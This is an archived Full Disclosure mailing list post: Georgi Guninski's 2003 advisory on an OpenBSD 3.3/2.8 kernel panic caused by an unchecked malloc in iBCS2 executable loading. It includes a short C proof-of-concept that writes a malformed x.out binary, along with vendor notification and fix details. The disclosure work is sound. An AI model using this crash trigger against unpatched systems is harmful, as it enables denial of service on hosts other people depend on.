Full Disclosure mailing list archives
OpenBSD kernel panic, yet still *BSD much better than windows
From: Georgi Guninski <guninski () guninski com>
Date: Wed, 5 Nov 2003 00:13:15 +0200
Georgi Guninski security advisory #63, 2003 OpenBSD kernel panic, yet still *BSD much better than windows Systems affected: tested on OpenBSD 3.3 and 2.8, probably other versions also affected Risk: Low Date: 4 November 2003 Legal Notice: This Advisory is Copyright (c) 2003 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre. If you want to link to this content use the URL: http://www.guninski.com/msuxobsd1.html Anything in this document may change without notice. Disclaimer: The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: By executing a specially crafted binary it is possible to cause kernel panic on at least OpenBSD 3.3 and 2.8. Details: The problem seems in "ibcs2_exec.c" line 619 of 738 --83%-- col 1-8 /* read in segment table */ xs = (struct xseg *)malloc(xep->xe_segsize, M_TEMP, M_WAITOK); error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t)xs, looks like malloc can return null. Another potential problem is: "exec_elf.c" line 792 of 827 --95%-- col 6-20 np = (Elf_Note *)malloc(ph->p_filesz, M_TEMP, M_WAITOK); The following code snippet demonstrates the problem: ------------------------------------ int main(int ac,char **av) { int fd; struct xexec xp; struct xext xep; char exe[10]; char fil[]="./vvc"; fd=open(fil,O_CREAT|O_RDWR,0700); if (fd==-1) {perror("open");return 1;} memset(&xp,0,sizeof(xp)); memset(&xep,0,sizeof(xep)); memset(exe,'v',sizeof(exe)); xp.x_magic = XOUT_MAGIC; xp.x_cpu = XC_386; xp.x_renv = XE_EXEC; xp.x_ext = sizeof(xep); xep.xe_segsize = -1; write(fd,&xp,sizeof(xp)); write(fd,&xep,sizeof(xep)); write(fd,exe,sizeof(exe)); printf("Now exec %s\n",fil); } ------------------------------------ C proggie which demonstrates the problem is available at: http://www.guninski.com/msuxobsd.c Note: the openbsd's errata claims the header is invalid, though it is believed the header to be valid and well formed. Vendor status: OpenBSD was notified on Mon, 3 Nov 2003 16:04:40 +0200. Fix was available in CVS in less than 24 hours. Fix available at http://www.openbsd.org/errata.html Regards, Georgi Guninski http://www.guninski.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- OpenBSD kernel panic, yet still *BSD much better than windows Georgi Guninski (Nov 04)
- Re: OpenBSD kernel panic, yet still *BSD much better than windows Georgi Guninski (Nov 05)